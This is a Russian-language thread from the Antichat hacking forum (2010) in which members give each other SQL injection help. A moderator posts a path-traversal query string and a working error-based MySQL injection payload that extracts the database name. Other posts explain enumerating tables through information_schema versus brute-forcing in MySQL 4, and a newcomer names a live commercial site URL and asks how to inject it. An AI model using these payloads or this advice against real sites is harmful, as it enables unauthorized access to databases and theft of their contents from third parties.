Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

04.06.2010, 07:23
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
/index.php?name=../index.php&p=../index.php&axn=1&query=../index.php
А вообще есть способ ещё один, по кол-ву вопросов в этой теме, который некто незнает.
Наз-ся вывод через ошибку ****...
/index.php?axn=1')or(1,1)=(select+count(0),concat(( select+database()+from+information_schema.tables+l imit+0,1),floor(rand(0)*2))from(information_schema .tables)group+by+2)--+
|
|
|

04.06.2010, 07:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
EoGeneo,DrakonSerg....
"Господа, задающие вопросы:
хватит ПИСАТЬ, попробуйте сначала хоть что-то ЧИТАТЬ !!!" (с) Jokester
Последний раз редактировалось Gorev; 04.06.2010 в 07:58..
|
|
|

04.06.2010, 08:08
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Сообщение от Gorev
EoGeneo,DrakonSerg....
"Господа, задающие вопросы:
хватит ПИСАТЬ, попробуйте сначала хоть что-то ЧИТАТЬ !!!" (с) Jokester
где почитать, уважаемый? Я кроме инфы, что нужно выводить через юнион селект или ордер би инфы не нашел.
Я бы с удовольствием сам бы поучился, но хз где учиться
|
|
|

04.06.2010, 08:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от DrakonSerg
где почитать, уважаемый? Я кроме инфы, что нужно выводить через юнион селект или ордер би инфы не нашел.
Я бы с удовольствием сам бы поучился, но хз где учиться
https://forum.antichat.ru/showpost.php?p=407227&postcount=3
Топик с маном по скулям.
|
|
|

04.06.2010, 09:01
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме: 315861
Репутация:
5
|
|
Ладно вопрос по другому поствлю.
GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
Какой запрос используется для получения списка в 4 ветке мускула.
|
|
|

04.06.2010, 09:04
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от EoGeneo
Ладно вопрос по другому поствлю.
GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
Какой запрос используется для получения списка в 4 ветке мускула.
О МАЙ ГАД Ты непобедим!
Кури маны, чо такое group_concat().
Если следовать твоей логике, то concat_ws специально mysql разработчики сделали для хакеров, ну мол там user(),database(),version() выводить одним запросом, а так же юзеров, пассы и т.п.
Извеняюсь забыл ещё.

Последний раз редактировалось Ctacok; 04.06.2010 в 09:09..
|
|
|

04.06.2010, 09:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от EoGeneo
Ладно вопрос по другому поствлю.
GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
Какой запрос используется для получения списка в 4 ветке мускула.
спусти тормозную жидкость...почитай ман по скулям... не раз уже тыкали носом в ман, неужели не хватает смелости все таки почитать что нибудь оттуда? тебе же сказали что информационная схема есть только в 5 версии мускула, а в 4 надо подбирать брутом..для этого есть куча утилит.. гугл тебе в помощь
|
|
|

04.06.2010, 09:16
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме: 315861
Репутация:
5
|
|
Сообщение от Gorev
спусти тормозную жидкость...почитай ман по скулям... не раз уже тыкали носом в ман, неужели не хватает смелости все таки почитать что нибудь оттуда? тебе же сказали что информационная схема есть только в 5 версии мускула, а в 4 надо подбирать брутом..для этого есть куча утилит.. гугл тебе в помощь
Спасибо, разобрался.
+
|
|
|

04.06.2010, 11:34
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме: 20441
Репутация:
0
|
|
привет команде;
http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения
я пробовал много методов, но никакого результата
Как можно "inject" этот сайт 
|
|
|

04.06.2010, 11:57
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
c чего вы взяли что там inject...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|